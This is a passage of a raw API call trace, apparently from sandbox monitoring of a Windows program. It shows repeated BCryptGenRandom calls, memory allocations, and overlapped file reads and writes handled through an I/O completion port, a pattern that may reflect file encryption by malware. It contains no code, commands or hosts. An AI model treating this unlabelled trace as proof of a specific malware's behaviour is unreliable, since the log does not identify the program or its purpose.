lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.745] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.745] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.745] free (_Block=0x3e305b8) [0199.745] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.745] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.745] free (_Block=0x1fa91d0) [0199.745] free (_Block=0x1fa2ed8) [0199.745] free (_Block=0x1fa90b8) [0199.745] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.760] CloseHandle (hObject=0x3cc) returned 1 [0199.760] free (_Block=0x1ff1e60) [0199.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.763] CloseHandle (hObject=0x338) returned 1 [0199.767] free (_Block=0x3d70450) [0199.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.770] CloseHandle (hObject=0x308) returned 1 [0199.770] free (_Block=0x3f70048) [0199.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.789] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.789] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.789] free (_Block=0x3e305b8) [0199.789] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.789] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.789] free (_Block=0x1fa91d0) [0199.789] free (_Block=0x1fa2ed8) [0199.789] free (_Block=0x1fa90b8) [0199.789] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.796] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.797] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.798] free (_Block=0x3e305b8) [0199.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.798] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.798] free (_Block=0x1fa91d0) [0199.798] free (_Block=0x1fa2ed8) [0199.798] free (_Block=0x1fa90b8) [0199.798] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.815] CloseHandle (hObject=0x308) returned 1 [0199.815] free (_Block=0x3df0008) [0199.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.818] CloseHandle (hObject=0x170) returned 1 [0199.818] free (_Block=0x1ff1e60) [0199.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.820] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.830] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x128e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.831] CloseHandle (hObject=0x3cc) returned 1 [0199.832] free (_Block=0x3f70048) [0199.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.880] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.882] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.882] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.882] free (_Block=0x3e305b8) [0199.882] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.882] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.882] free (_Block=0x1fa91d0) [0199.882] free (_Block=0x1fa2ed8) [0199.882] free (_Block=0x1fa90b8) [0199.882] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.891] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.891] free (_Block=0x3e305b8) [0199.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.891] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.892] free (_Block=0x1fa91d0) [0199.892] free (_Block=0x1fa2ed8) [0199.892] free (_Block=0x1fa90b8) [0199.892] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.897] CloseHandle (hObject=0x3cc) returned 1 [0199.897] free (_Block=0x3df0008) [0199.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.908] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.908] free (_Block=0x3e305b8) [0199.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.908] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.908] free (_Block=0x1fa91d0) [0199.908] free (_Block=0x1fa2ed8) [0199.908] free (_Block=0x1fa90b8) [0199.908] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.942] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.947] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.956] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.966] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x6ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.977] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x56c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.990] CloseHandle (hObject=0x3cc) returned 1 [0199.990] free (_Block=0x3df0008) [0199.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.998] CloseHandle (hObject=0x338) returned 1 [0199.998] free (_Block=0x1ff1e60) [0199.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.000] CloseHandle (hObject=0x170) returned 1 [0200.000] free (_Block=0x3d70450) [0200.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.001] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0200.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.013] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.014] CloseHandle (hObject=0x3cc) returned 1 [0200.014] free (_Block=0x3df0008) [0200.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.191] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.191] free (_Block=0x3e305b8) [0200.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.191] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0200.191] free (_Block=0x1fa91d0) [0200.191] free (_Block=0x77d7a8) [0200.191] free (_Block=0x1fa90b8) [0200.191] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.210] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xfbc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.210] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.211] CloseHandle (hObject=0x308) returned 1 [0200.211] free (_Block=0x1ff1e60) [0200.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.219] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.219] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.219] free (_Block=0x3e305b8) [0200.219] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.219] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.220] free (_Block=0x1fa91d0) [0200.220] free (_Block=0x1fa2ed8) [0200.220] free (_Block=0x1fa90b8) [0200.220] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.242] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.256] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc6e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.256] CloseHandle (hObject=0x308) returned 1 [0200.256] free (_Block=0x1ff1e60) [0200.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0200.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0200.276] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.277] free (_Block=0x3e305b8) [0200.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.277] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.277] free (_Block=0x1fa91d0) [0200.277] free (_Block=0x1fa2ed8) [0200.277] free (_Block=0x1fa90b8) [0200.277] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0200.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: 